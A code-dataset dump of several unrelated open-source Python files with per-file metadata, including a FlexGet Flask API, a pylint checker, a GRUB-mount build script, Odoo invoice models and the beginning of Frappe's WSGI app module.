"On the first day algorithm volatility does not exist.")
second_msg = gen.next()
self.assertIsNotNone(second_msg, "There should be a message "
"emitted.")
self.assertEqual(1, len(algo.portfolio.positions),
"Number of positions should stay the same.")
# TODO: Hand derive. Current value is just a canary to
# detect changes.
np.testing.assert_almost_equal(
0.050022510129558301,
crm.algorithm_returns[-1],
decimal=6)
third_msg = gen.next()
self.assertEqual(1, len(algo.portfolio.positions),
"Number of positions should stay the same.")
self.assertIsNotNone(third_msg, "There should be a message "
"emitted.")
# TODO: Hand derive. Current value is just a canary to
# detect changes.
np.testing.assert_almost_equal(
-0.047639464532418657,
crm.algorithm_returns[-1],
decimal=6)
| apache-2.0 | 354,420,153,847,497,400 | 32.595308 | 78 | 0.464735 | false |
OpenSlides/openslides-votecollector | setup.py | 1 | 1308 | from setuptools import find_packages, setup
package_name = 'openslides-votecollector'
module_name = 'openslides_votecollector'
module = __import__(module_name)
with open('README.rst') as readme:
long_description = readme.read()
with open('requirements.txt') as requirements:
install_requires = requirements.readlines()
setup(
name=package_name,
author='Authors of %s, see AUTHORS' % module.__verbose_name__,
author_email='[email protected]',
description=module.__verbose_name__,
license=module.__license__,
long_description=long_description,
url=module.__url__,
version=module.__version__,
keywords='OpenSlides',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Plugins',
'Environment :: Web Environment',
'Framework :: Django',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
packages=find_packages(exclude=['tests']),
include_package_data=True,
install_requires=install_requires,
entry_points={'openslides_plugins': '%s = %s' % (module.__verbose_name__, module_name)})
| mit | 434,190,824,964,950,200 | 32.538462 | 92 | 0.651376 | false |
ibrahimkarahan/Flexget | flexget/ui/api.py | 5 | 7172 | from flask import request, jsonify, Blueprint, Response, flash
import flexget
from flexget.config_schema import resolve_ref, process_config, get_schema
from flexget.manager import manager
from flexget.options import get_parser
from flexget.plugin import plugin_schemas
from flexget.utils.tools import BufferQueue
API_VERSION = 1
api = Blueprint('api', __name__, url_prefix='/api')
# Serves the appropriate schema for any /api method. Schema for /api/x/y can be found at /schema/api/x/y
api_schema = Blueprint('api_schema', __name__, url_prefix='/schema/api')
@api.after_request
def attach_schema(response):
# TODO: Check if /schema/ourpath exists
schema_path = '/schema' + request.path
response.headers[b'Content-Type'] += '; profile=%s' % schema_path
return response
@api_schema.route('/version')
def version_schema():
return jsonify({
'type': 'object',
'properties': {
'flexget_version': {'type': 'string', 'description': 'FlexGet version string'},
'api_version': {'type': 'integer', 'description': 'Version of the json api'}
}
})
@api.route('/version')
def version():
return jsonify(flexget_version=flexget.__version__, api_version=API_VERSION)
exec_parser = get_parser('execute')
@api.route('/execute', methods=['GET', 'POST'])
def execute():
kwargs = request.json or {}
options_string = kwargs.pop('options_string', '')
if options_string:
try:
kwargs['options'] = exec_parser.parse_args(options_string, raise_errors=True).execute
except ValueError as e:
return jsonify(error='invalid options_string specified: %s' % e.message), 400
# We'll stream the log results as they arrive in the bufferqueue
kwargs['output'] = BufferQueue()
manager.execute(**kwargs)
return Response(kwargs['output'], mimetype='text/plain'), 200
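def _example_execute_client(base_url='http://localhost:5050'):
    # Editor's illustrative sketch (not part of the original module): one way a
    # client might stream the log produced by the /execute endpoint above. The
    # host/port and the use of the `requests` package are assumptions.
    import requests
    resp = requests.post(base_url + '/api/execute',
                         json={'options_string': '--learn'}, stream=True)
    for line in resp.iter_lines():
        print line  # log lines arrive as the BufferQueue produces them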
task_schema = {
'type': 'object',
'properties': {
'name': {'type': 'string', 'description': 'The name of this task.'},
'config': plugin_schemas(context='task')
},
'required': ['name'],
'additionalProperties': False,
'links': [
{'rel': 'self', 'href': '/api/tasks/{name}/'},
{'rel': 'edit', 'method': 'PUT', 'href': '', 'schema': {'$ref': '#'}},
{'rel': 'delete', 'method': 'DELETE', 'href': ''}
]
}
tasks_schema = {
'type': 'object',
'properties': {
'tasks': {
'type': 'array',
'items': {'$ref': '/schema/api/tasks/task'},
'links': [
{'rel': 'add', 'method': 'POST', 'href': '/api/tasks/', 'schema': {'$ref': '/schema/api/tasks/task'}}
]
}
}
}
# TODO: Maybe these should be in /config/tasks
@api_schema.route('/tasks/')
def schema_tasks():
return jsonify(tasks_schema)
@api.route('/tasks/', methods=['GET', 'POST'])
def api_tasks():
if request.method == 'GET':
tasks = []
for name in manager.tasks:
tasks.append({'name': name, 'config': manager.config['tasks'][name]})
return jsonify(tasks=tasks)
elif request.method == 'POST':
# TODO: Validate and add task
pass
@api_schema.route('/tasks/<task>/')
def schema_task(task):
return jsonify(task_schema)
@api.route('/tasks/<task>/', methods=['GET', 'PUT', 'DELETE'])
def api_task(task):
if request.method == 'GET':
if task not in manager.tasks:
return jsonify(error='task {task} not found'.format(task=task)), 404
        return jsonify({'name': task, 'config': manager.config['tasks'][task]})
elif request.method == 'PUT':
# TODO: Validate then set
# TODO: Return 204 if name has been changed
pass
elif request.method == 'DELETE':
manager.config['tasks'].pop(task)
@api_schema.route('/config/')
def cs_root():
root_schema = get_schema()
hyper_schema = root_schema.copy()
hyper_schema['links'] = [{'rel': 'self', 'href': '/api/config/'}]
hyper_schema['properties'] = root_schema.get('properties', {}).copy()
hs_props = hyper_schema['properties']
for key, key_schema in root_schema.get('properties', {}).iteritems():
hs_props[key] = hs_props[key].copy()
hs_props[key]['links'] = [{'rel': 'self', 'href': key}]
if key not in root_schema.get('required', []):
hs_props[key]['links'].append({'rel': 'delete', 'href': '', 'method': 'DELETE'})
return jsonify(hyper_schema)
# TODO: none of these should allow setting invalid config
@api.route('/config/', methods=['GET', 'PUT'])
def config_root():
return jsonify(manager.config)
@api_schema.route('/config/<section>')
def schema_config_section(section):
return jsonify(resolve_ref('/schema/config/%s' % section))
@api.route('/config/<section>/', methods=['GET', 'PUT', 'DELETE'])
def config_section(section):
if request.method == 'PUT':
schema = resolve_ref('/schema/config/%s' % section)
errors = process_config(request.json, schema, set_defaults=False)
if errors:
return jsonify({'$errors': errors}), 400
manager.config[section] = request.json
if section not in manager.config:
return jsonify(error='Not found'), 404
if request.method == 'DELETE':
del manager.config[section]
return Response(status=204)
response = jsonify(manager.config[section])
response.headers[b'Content-Type'] += '; profile=/schema/config/%s' % section
return response
# TODO: Abandon this and move above task handlers into /config?
@api.route('/config/tasks/<taskname>/', methods=['GET', 'PUT', 'DELETE'])
def config_tasks(taskname):
if request.method != 'PUT':
if taskname not in manager.config['tasks']:
return jsonify(error='Requested task does not exist'), 404
status_code = 200
if request.method == 'PUT':
if 'rename' in request.args:
pass # TODO: Rename the task, return 204 with new location header
if taskname not in manager.config['tasks']:
status_code = 201
manager.config['tasks'][taskname] = request.json
elif request.method == 'DELETE':
del manager.config['tasks'][taskname]
return Response(status=204)
return jsonify(manager.config['tasks'][taskname]), status_code
# TODO: Move this route to template plugin
@api_schema.route('/config/templates/', defaults={'section': 'templates'})
@api_schema.route('/config/tasks/', defaults={'section': 'tasks'})
def cs_task_container(section):
hyper_schema = {'links': [{'rel': 'create',
'href': '',
'method': 'POST',
'schema': {
'type': 'object',
'properties': {'name': {'type': 'string'}},
                                   'required': ['name']}}]}
    return jsonify(hyper_schema)
# TODO: Move this route to template plugin
@api_schema.route('/config/templates/<name>', defaults={'section': 'templates'})
@api_schema.route('/config/tasks/<name>', defaults={'section': 'tasks'})
def cs_plugin_container(section, name):
    return jsonify(plugin_schemas(context='task'))
| mit | -145,441,332,919,503,260 | 33.647343 | 117 | 0.602064 | false |
rogalski/pylint | pylint/extensions/emptystring.py | 4 | 2417 | # -*- coding: utf-8 -*-
# Copyright (c) 2016 Alexander Todorov <[email protected]>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
"""Looks for comparisons to empty string."""
import itertools
import astroid
from pylint import interfaces
from pylint import checkers
from pylint.checkers import utils
def _is_constant_empty_str(node):
return isinstance(node, astroid.Const) and node.value == ''
class CompareToEmptyStringChecker(checkers.BaseChecker):
"""Checks for comparisons to empty string.
Most of the times you should use the fact that empty strings are false.
An exception to this rule is when an empty string value is allowed in the program
and has a different meaning than None!
"""
__implements__ = (interfaces.IAstroidChecker,)
# configuration section name
name = 'compare-to-empty-string'
msgs = {'C1901': ('Avoid comparisons to empty string',
'compare-to-empty-string',
'Used when Pylint detects comparison to an empty string constant.'),
}
priority = -2
options = ()
@utils.check_messages('compare-to-empty-string')
def visit_compare(self, node):
_operators = ['!=', '==', 'is not', 'is']
# note: astroid.Compare has the left most operand in node.left
# while the rest are a list of tuples in node.ops
# the format of the tuple is ('compare operator sign', node)
# here we squash everything into `ops` to make it easier for processing later
ops = [('', node.left)]
ops.extend(node.ops)
ops = list(itertools.chain(*ops))
for ops_idx in range(len(ops) - 2):
op_1 = ops[ops_idx]
op_2 = ops[ops_idx + 1]
op_3 = ops[ops_idx + 2]
error_detected = False
# x ?? ""
if _is_constant_empty_str(op_1) and op_2 in _operators:
error_detected = True
# '' ?? X
elif op_2 in _operators and _is_constant_empty_str(op_3):
error_detected = True
if error_detected:
self.add_message('compare-to-empty-string', node=node)
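# --- Editor's illustrative sketch (not part of the original checker) ---
# What the sliding three-element window above reports, and the usual rewrite:
#   if name == '':      # reported as C1901 (compare-to-empty-string)
#       ...
#   if not name:        # preferred: rely on empty strings being falsy
#       ...
# Chained comparisons such as '' != x != 'foo' are caught as well, because the
# window visits every (operand, operator, operand) triple built from node.left
# and node.ops.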
def register(linter):
"""Required method to auto register this checker."""
linter.register_checker(CompareToEmptyStringChecker(linter))
| gpl-2.0 | 3,413,561,731,749,634,600 | 33.042254 | 90 | 0.625155 | false |
ndtran/compassion-accounting | recurring_contract/model/invoice.py | 1 | 1713 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Cyril Sester <[email protected]>
#
# The licence is in the file __openerp__.py
#
##############################################################################
from openerp import api, fields, models
class account_invoice(models.Model):
_name = 'account.invoice'
_inherit = 'account.invoice'
recurring_invoicer_id = fields.Many2one(
'recurring.invoicer', 'Invoicer')
class account_invoice_line(models.Model):
_name = 'account.invoice.line'
_inherit = 'account.invoice.line'
contract_id = fields.Many2one(
'recurring.contract', 'Source contract')
due_date = fields.Date(
compute='_get_invoice_lines_date_due',
readonly=True, store=True)
state = fields.Selection(
compute='_get_invoice_lines_state',
readonly=True, store=True,
selection=[('draft', 'Draft'),
('proforma', 'Pro-forma'),
('proforma2', 'Pro-forma'),
('open', 'Open'),
('paid', 'Paid'),
('cancel', 'Cancelled')])
@api.depends('invoice_id.state')
def _get_invoice_lines_state(self):
for invoice_line in self:
invoice_line.state = invoice_line.invoice_id.state
@api.depends('invoice_id.date_due')
def _get_invoice_lines_date_due(self):
for invoice_line in self:
invoice_line.due_date = invoice_line.invoice_id.date_due
| agpl-3.0 | 5,345,413,194,025,163,000 | 31.153846 | 78 | 0.52948 | false |
albertz/grub-fuse | compile.py | 1 | 4476 | #!/usr/bin/python
import os, os.path, sys
os.chdir(os.path.dirname(__file__))
try: os.mkdir("build")
except: pass
import re
from fnmatch import fnmatch
from pipes import quote
from pprint import pprint
CFLAGS = "-g -Wall -Iinclude -Igrub-core/gnulib " + \
"-Ibuild -DLIBDIR=\\\"/usr/local/lib\\\" " + \
"-DHAVE_CONFIG_H=1 -DGRUB_UTIL=1 " + \
"-DGRUB_FILE=__FILE__ " + \
"-D_FILE_OFFSET_BITS=64 " + \
"-fnested-functions " + \
"-DAPPLE_CC "
LDFLAGS = "-lfuse4x"
configh = open("build/config.h", "w")
configh.write("""
#define PACKAGE_NAME "grub"
#define PACKAGE_VERSION "1.0.0"
#define HAVE_WORKING_O_NOFOLLOW 1
#define HAVE_DECL_FWRITE_UNLOCKED 0
#define HAVE_DECL_FPUTS_UNLOCKED 0
#define __getopt_argv_const const
#define _GL_UNUSED
#if defined(__i386__)
#define NESTED_FUNC_ATTR __attribute__ ((__regparm__ (1)))
#else
#define NESTED_FUNC_ATTR
#endif
#if defined(__i386__)
#define SIZEOF_LONG 4
#define SIZEOF_VOID_P 4
#elif defined(__x86_64__)
#define SIZEOF_LONG 8
#define SIZEOF_VOID_P 8
#else
#error "unknown arch"
#endif
#define GRUB_TARGET_SIZEOF_VOID_P SIZEOF_VOID_P
char* strchrnul (const char *s, int c_in);
""")
for funcn in ["strcmp","strlen","strchr","strrchr","strdup","strtoull"]:
configh.write("#define grub_" + funcn + " " + funcn + "\n")
configh.close()
open("build/config-util.h", "w").write("")
re_grubmodinit = re.compile("GRUB_MOD_INIT\s*\((.+)\)")
ofiles = []
grubmods = []
def compile(fn):
basen,ext = os.path.splitext(fn)
ofile = "build/" + basen.replace("/","_") + ".o"
if ofile in ofiles: return # hm, whatever...
cmd = "gcc -c " + CFLAGS + " " + quote(fn) + " -o " + quote(ofile)
print cmd
assert os.system(cmd) == 0
ofiles.append(ofile)
m = re_grubmodinit.search(open(fn).read())
if m: grubmods.append(m.group(1))
re_base_start = re.compile("^([a-z]+) = {")
re_base_end = re.compile("^};")
re_entry_stmnt = re.compile("^ *([a-z_0-9]+);$")
re_entry = re.compile("^ *([a-z_0-9]+) = (.*);$")
content = {} # type (e.g. 'program') -> list -> dict
curentry = None
for l in open("Makefile.util.def"):
l = l.strip("\n")
if l.strip() == "": continue
if l.strip()[0:1] == "#": continue
m = re_base_start.match(l)
if m:
typename = m.group(1)
curentry = {}
if typename not in content: content[typename] = []
content[typename].append(curentry)
continue
m = re_base_end.match(l)
if m:
curentry = None
continue
if curentry is not None:
if re_entry_stmnt.match(l): continue
m = re_entry.match(l)
assert m, "no match in " + repr(l)
k,v = m.groups()
if k not in curentry:
curentry[k] = []
curentry[k].append(v)
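# --- Editor's illustrative sketch (not part of the original script) ---
# After the loop above, `content` maps block types to lists of dicts whose
# values are lists (a key may repeat inside one block). For a block such as
#   program = {
#     name = grub-mount;
#     common = util/grub-mount.c;
#     ldadd = libgrubmods.a;
#   };
# the parsed entry is roughly
#   {'name': ['grub-mount'], 'common': ['util/grub-mount.c'], 'ldadd': ['libgrubmods.a']}
# (the file names here are assumptions for illustration only).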
libs = {}
progs = {}
for l in content["library"]:
libs[l["name"][0]] = l
for l in content["program"]:
progs[l["name"][0]] = l
# ------------
def read_gnulib_makefile():
re_vardef = re.compile("^([a-zA-Z_]+) *= *(.*)$")
re_variadd = re.compile("^([a-zA-Z_]+) *\+= *(.*)$")
re_filerules = re.compile("^([a-zA-Z_.\-\+/]+) *: *(.*)$")
vars = {}
fileiter = iter(open("grub-core/gnulib/Makefile.am"))
for l in fileiter:
while True:
l = l.strip("\n")
if l[-1:] == "\\":
l = l[:-1]
l += next(fileiter)
else: break
if l.strip() == "": continue
if l.strip()[0:1] == "#": continue
m = re_vardef.match(l)
if m:
k,v = m.groups()
assert not k in vars
vars[k] = v
continue
m = re_variadd.match(l)
if m:
k,v = m.groups()
assert k in vars
vars[k] += " " + v
continue
m = re_filerules.match(l)
if m:
# ignore
continue
if l[0:1] == "\t": # file rule part
continue
assert False, l + " not matched"
return vars["libgnu_a_SOURCES"].split()
# ------------
prog = progs["grub-mount"]
lddeps = []
curtarget = prog
while True:
for f in curtarget["common"]:
compile(f)
for d in curtarget.get("ldadd", []):
if fnmatch(d, "lib*.a"):
lddeps.append(d)
if not lddeps: break
curtarget = libs[lddeps.pop(0)]
for f in read_gnulib_makefile():
if not fnmatch(f, "*.c"): continue
compile("grub-core/gnulib/" + f)
assert os.system("sh geninit.sh " + " ".join(map(quote, grubmods)) + " >build/grubinit.c") == 0
compile("build/grubinit.c")
# additional stuff
compile("grub-core/gnulib/mempcpy.c")
compile("grub-core/gnulib/strchrnul.c")
compile("grub-core/gnulib/getopt.c")
compile("grub-core/gnulib/getopt1.c")
compile("grub-core/gnulib/rawmemchr.c")
compile("grub-core/gnulib/basename-lgpl.c")
cmd = "g++ " + LDFLAGS + " " + " ".join(map(quote, ofiles)) + " -o build/grub-mount"
print cmd
assert os.system(cmd) == 0
| gpl-3.0 | 3,300,640,583,022,266,400 | 23.459016 | 95 | 0.613047 | false |
fgoudreault/auxiclean | auxiclean/gui/equality_breaker.py | 1 | 3366 | from .auxiliary_window import AuxiliaryWindow
from ..handler import TextHandler
import tkinter as tk
import tkinter.scrolledtext
import tkinter.messagebox
class EqualityBreaker(AuxiliaryWindow):
_title = "Auxiclean - EqualityBreaker"
_loggername = "auxiclean.gui.equality_breaker"
def __init__(self, candidates, nchoices, course, *args, **kwargs):
        # store the selection parameters for this window
self.nchoices = nchoices
self.choices = []
self.course = course
self.candidates = candidates
super().__init__(*args, **kwargs)
def create_window(self):
candidates = self.candidates
nchoices = self.nchoices
course = self.course
# instructions
p = ("Des égalités sont présentes pour le cours: %s.\n"
"Il faut choisir %i candidat(e)s parmis les choix suivants.\n"
"SVP, cocher les candidatures désirées pour ce cours." %
(course, nchoices))
self.instructionsText = tk.Label(self.frame, text=p, anchor=tk.W,
justify=tk.LEFT)
self.instructionsText.grid(column=0, row=0)
# candidates list, create checkboxes
self.checkbuttons = {}
for i, candidate in enumerate(candidates):
d = {"var": tk.Variable(),
"candidate": candidate}
self.checkbuttons[candidate.name] = d
button = tk.Checkbutton(self.frame, text=candidate.name,
anchor="w",
variable=d["var"],
)
button.deselect()
button.grid(row=i + 1, column=0)
# done button
self.doneButton = tk.Button(self.frame, text="Terminé",
command=self.compile_results)
self.doneButton.grid()
# create log box
# adapted from this SO post:
# https://stackoverflow.com/a/41959785/6362595
# Add text widget to display logging info
self.logBox = tk.scrolledtext.ScrolledText(self.frame,
state='disabled')
self.logBox.configure(font='TkFixedFont')
self.logBox.grid(sticky='w', columnspan=1)
# Create textLogger
self.text_handler = TextHandler(self.logBox)
# Logging configuration
self._logger.addHandler(self.text_handler)
def compile_results(self):
choices = self.get_checkboxes_results()
if len(choices) == self.nchoices:
confirm = tk.messagebox.askquestion("Confirmer Choix",
"Êtes-vous sûr(e)"
" de ces choix?")
if confirm == "yes":
self.choices = choices
self.quit()
return
else:
# confirm == "no"
return
self._logger.warn("Nombre de candidatures choisies invalide (%i/%i)" %
(len(choices), self.nchoices))
def get_checkboxes_results(self):
results = []
for name, checkbox in self.checkbuttons.items():
if int(checkbox["var"].get()):
# if button is toggled, it will return 1. otherwise 0
results.append(self.checkbuttons[name]["candidate"])
return results
| mit | -8,210,463,254,876,397,000 | 38.505882 | 78 | 0.538416 | false |
statX/nz-houses | clients/client_koordinates.py | 1 | 1958 | #!/usr/bin/env python
#http://api.trademe.co.nz/v1/Listings/553527490.json
import oauth2 as oauth
import time
import urllib2
import json
def retrieve_school_zone():
with open('./kdapikeys.txt') as fileObject:
KEYHERE = fileObject.readline().strip()
#school zone request
apiRequest = 'http://api.koordinates.com/api/vectorQuery.json/?key=' + KEYHERE + '&layer=743&x='
apiRequest += str(174.6964)
apiRequest += '&y='
apiRequest += str(-36.9246)
apiRequest += '&radius=0'
rs = urllib2.urlopen(apiRequest)
result_string = rs.read()
results = json.loads(result_string)
features = results.get('vectorQuery').get('layers').get('743').get('features')
for i in range(0,len(features)):
distance = features[i].get('properties').get('distance')
schoolID = features[i].get('properties').get('SchoolID')
schoolName = features[i].get('properties').get('SchoolName')
effectiveDate = features[i].get('properties').get('EffectiveDate')
iNSTTYPE = features[i].get('properties').get('INSTTYPE')
# create tuple and append to tuples
def retrieve_elevation():
with open('./kdapikeys.txt') as fileObject:
KEYHERE = fileObject.readline().strip()
#apiRequest = 'http://api.koordinates.com/api/vectorQuery.json?key=' + KEYHERE + '&layer=1165&x=174.7254467010498&y=-36.871106809995844&max_results=3&radius=10000&geometry=true&with_field_names=true'
#apiRequest = 'http://api.koordinates.com/api/vectorQuery.json?key=' + KEYHERE + '&layer=281&x=174.7254467010498&y=-36.871106809995844&max_results=3&radius=10000&geometry=true&with_field_names=true'
apiRequest = 'http://api.koordinates.com/api/vectorQuery.json?key=' + KEYHERE + '&layer=1066&x=174.7254467010498&y=-36.871106809995844&max_results=3&radius=0&geometry=true&with_field_names=true'
rs = urllib2.urlopen(apiRequest)
result_string = rs.read()
results = json.loads(result_string)
print results
if __name__ == '__main__':
retrieve_school_zone()
retrieve_elevation()
| bsd-2-clause | -1,435,137,139,717,250,800 | 33.350877 | 200 | 0.720633 | false |
yoshinarikou/MilleFeuilleRaspberryPi | milpython/milpy/lib/gpio.py | 1 | 1610 | ########################################################################
# MCU Gear(R) system Sample Code
# Author: y.kou.
# web site: http://www.milletool.com/
# Date : 8/OCT/2016
#
########################################################################
#Revision Information
#
########################################################################
#!/usr/bin/python
from ..mil import mil
from ..mil import p
from ..mil import wiringdata
moduleAddress1 = 0x8000
moduleAddress2 = 0x0001
moduleAddress = 0x80000001
def getInfo(Number):
if ((Number >= 0) and (Number <= 3)):
address = moduleAddress + Number
address2 = moduleAddress2 + Number
address1 = moduleAddress1
#check address
testaddr = (address1<<16) + address2
if address != testaddr:
print "ERROR: Device address is not correct!"
address1 = -1
address2 = -1
else:
address = -1
IOdata = wiringdata.getWiring(address)
datas = [address1,address2]
datas.extend(IOdata)
return datas
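def _example_getInfo_sketch():
	# Editor's illustrative sketch (not part of the original library): the
	# address arithmetic that getInfo() performs for an assumed Number = 2.
	number = 2
	address = moduleAddress + number     # 0x80000001 + 2 = 0x80000003
	address2 = moduleAddress2 + number   # 0x0001 + 2 = 0x0003
	# the consistency check in getInfo() verifies this relation:
	assert ((moduleAddress1 << 16) + address2) == address
	return moduleAddress1, address2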
def getAddr(Number):
address = -1
if ((Number >= 0) and (Number <= 3)):
address = moduleAddress2 + Number
else:
address = -1
	return moduleAddress1,address
def getIOs():
IOdata = wiringdata.getWiring(moduleAddress)
return IOdata
#digital out function
def DigitalOut(milModClass, pinNo, HighLow):
wiringdata.IOout(milModClass.pinData[pinNo],HighLow)
#digital in function
def DigitalIn(milModClass, pinNo):
return wiringdata.IOin(milModClass.pinData[pinNo])
def turnMotor(milModClass, HighLow1, HighLow2):
wiringdata.IOout(milModClass.pinData[0],HighLow1)
wiringdata.IOout(milModClass.pinData[1],HighLow2)
| mit | 5,481,458,723,627,884,000 | 23.769231 | 72 | 0.631056 | false |
aliok/trnltk | trnltk/morphology/contextful/likelihoodmetrics/hidden/test/test_simplegoodturing.py | 1 | 3202 | # coding=utf-8
"""
Copyright 2012 Ali Ok (aliokATapacheDOTorg)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
There is no verification -yet- in the tests of this class.
The tests are there to make sure there are no run-time exceptions.
"""
import logging
import unittest
from trnltk.morphology.contextful.likelihoodmetrics.hidden.simplegoodturing import logger, SimpleGoodTuringSmoother
K = 5
class SimpleGoodTuringSmootherTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(SimpleGoodTuringSmootherTest, cls).setUpClass()
def setUp(self):
logging.basicConfig(level=logging.INFO)
logger.setLevel(logging.DEBUG)
def test_smoother_assertions(self):
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(0, {1:2}, 3))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(2, {}, 2))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(2, {1:2}, 0))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(1, {0:1}, 3))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(1, {1:2}, 1))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(1, {1:2}, 2))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(2, {1:2, 2:3}, 2))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(2, {1:2, 2:3}, 3))
def test_with_small_values(self):
smoother = SimpleGoodTuringSmoother(K, {1: 10, 2: 5, 3: 3, 4: 2, 5: 1, 6: 0}, 100)
smoother.initialize()
for i in range(0, K + 5):
logger.info("c_{} : {}, \t c*_{} : {}".format(i, i, i, smoother.smooth(i)))
def test_with_larger_values(self):
smoother = SimpleGoodTuringSmoother(K, {1: 268, 2: 112, 3: 70, 4: 41, 5: 24, 6: 14, 7: 15, 400: 1, 1918: 1}, 1000)
smoother.initialize()
for i in range(0, K + 5):
logger.info("c_{} : {}, \t c*_{} : {}".format(i, i, i, smoother.smooth(i)))
def test_with_larger_values_sc_2(self):
smoother = SimpleGoodTuringSmoother(K, {1: 16181, 2: 2213, 3: 870, 4: 431, 5: 304, 6: 202}, 2111251811)
smoother.initialize()
for i in range(0, K + 5):
logger.info("c_{} : {}, \t c*_{} : {}".format(i, i, i, smoother.smooth(i)))
def test_with_zero_frequencies_in_between(self):
smoother = SimpleGoodTuringSmoother(K, {1: 268, 2: 0, 3: 70, 4: 0, 5: 24, 6: 14, 7: 15, 400: 1, 1918: 1}, 1000)
smoother.initialize()
for i in range(0, K + 5):
logger.info("c_{} : {}, \t c*_{} : {}".format(i, i, i, smoother.smooth(i)))
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 2,126,987,249,120,535,000 | 39.531646 | 122 | 0.657089 | false |
adityahase/frappe | frappe/app.py | 1 | 8114 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import os
from six import iteritems
import logging
from werkzeug.wrappers import Request
from werkzeug.local import LocalManager
from werkzeug.exceptions import HTTPException, NotFound
from werkzeug.middleware.profiler import ProfilerMiddleware
from werkzeug.middleware.shared_data import SharedDataMiddleware
import frappe
import frappe.handler
import frappe.auth
import frappe.api
import frappe.utils.response
import frappe.website.render
from frappe.utils import get_site_name, sanitize_html
from frappe.middlewares import StaticDataMiddleware
from frappe.utils.error import make_error_snapshot
from frappe.core.doctype.comment.comment import update_comments_in_parent_after_request
from frappe import _
import frappe.recorder
import frappe.monitor
import frappe.rate_limiter
local_manager = LocalManager([frappe.local])
_site = None
_sites_path = os.environ.get("SITES_PATH", ".")
class RequestContext(object):
def __init__(self, environ):
self.request = Request(environ)
def __enter__(self):
init_request(self.request)
def __exit__(self, type, value, traceback):
frappe.destroy()
@Request.application
def application(request):
response = None
try:
rollback = True
init_request(request)
frappe.recorder.record()
frappe.monitor.start()
frappe.rate_limiter.apply()
if frappe.local.form_dict.cmd:
response = frappe.handler.handle()
elif frappe.request.path.startswith("/api/"):
response = frappe.api.handle()
elif frappe.request.path.startswith('/backups'):
response = frappe.utils.response.download_backup(request.path)
elif frappe.request.path.startswith('/private/files/'):
response = frappe.utils.response.download_private_file(request.path)
elif frappe.local.request.method in ('GET', 'HEAD', 'POST'):
response = frappe.website.render.render()
else:
raise NotFound
except HTTPException as e:
return e
except frappe.SessionStopped as e:
response = frappe.utils.response.handle_session_stopped()
except Exception as e:
response = handle_exception(e)
else:
rollback = after_request(rollback)
finally:
if frappe.local.request.method in ("POST", "PUT") and frappe.db and rollback:
frappe.db.rollback()
# set cookies
if response and hasattr(frappe.local, 'cookie_manager'):
frappe.local.cookie_manager.flush_cookies(response=response)
frappe.rate_limiter.update()
frappe.monitor.stop(response)
frappe.recorder.dump()
if hasattr(frappe.local, 'conf') and frappe.local.conf.enable_frappe_logger:
frappe.logger("frappe.web", allow_site=frappe.local.site).info({
"site": get_site_name(request.host),
"remote_addr": getattr(request, "remote_addr", "NOTFOUND"),
"base_url": getattr(request, "base_url", "NOTFOUND"),
"full_path": getattr(request, "full_path", "NOTFOUND"),
"method": getattr(request, "method", "NOTFOUND"),
"scheme": getattr(request, "scheme", "NOTFOUND"),
"http_status_code": getattr(response, "status_code", "NOTFOUND")
})
if response and hasattr(frappe.local, 'rate_limiter'):
response.headers.extend(frappe.local.rate_limiter.headers())
frappe.destroy()
return response
def init_request(request):
frappe.local.request = request
frappe.local.is_ajax = frappe.get_request_header("X-Requested-With")=="XMLHttpRequest"
site = _site or request.headers.get('X-Frappe-Site-Name') or get_site_name(request.host)
frappe.init(site=site, sites_path=_sites_path)
if not (frappe.local.conf and frappe.local.conf.db_name):
# site does not exist
raise NotFound
if frappe.local.conf.get('maintenance_mode'):
frappe.connect()
raise frappe.SessionStopped('Session Stopped')
make_form_dict(request)
frappe.local.http_request = frappe.auth.HTTPRequest()
def make_form_dict(request):
import json
request_data = request.get_data(as_text=True)
if 'application/json' in (request.content_type or '') and request_data:
args = json.loads(request_data)
else:
args = request.form or request.args
try:
frappe.local.form_dict = frappe._dict({ k:v[0] if isinstance(v, (list, tuple)) else v \
for k, v in iteritems(args) })
except IndexError:
frappe.local.form_dict = frappe._dict(args)
if "_" in frappe.local.form_dict:
# _ is passed by $.ajax so that the request is not cached by the browser. So, remove _ from form_dict
frappe.local.form_dict.pop("_")
def handle_exception(e):
response = None
http_status_code = getattr(e, "http_status_code", 500)
return_as_message = False
if frappe.get_request_header('Accept') and (frappe.local.is_ajax or 'application/json' in frappe.get_request_header('Accept')):
# handle ajax responses first
# if the request is ajax, send back the trace or error message
response = frappe.utils.response.report_error(http_status_code)
elif (http_status_code==500
and (frappe.db and isinstance(e, frappe.db.InternalError))
and (frappe.db and (frappe.db.is_deadlocked(e) or frappe.db.is_timedout(e)))):
http_status_code = 508
elif http_status_code==401:
frappe.respond_as_web_page(_("Session Expired"),
_("Your session has expired, please login again to continue."),
http_status_code=http_status_code, indicator_color='red')
return_as_message = True
elif http_status_code==403:
frappe.respond_as_web_page(_("Not Permitted"),
_("You do not have enough permissions to complete the action"),
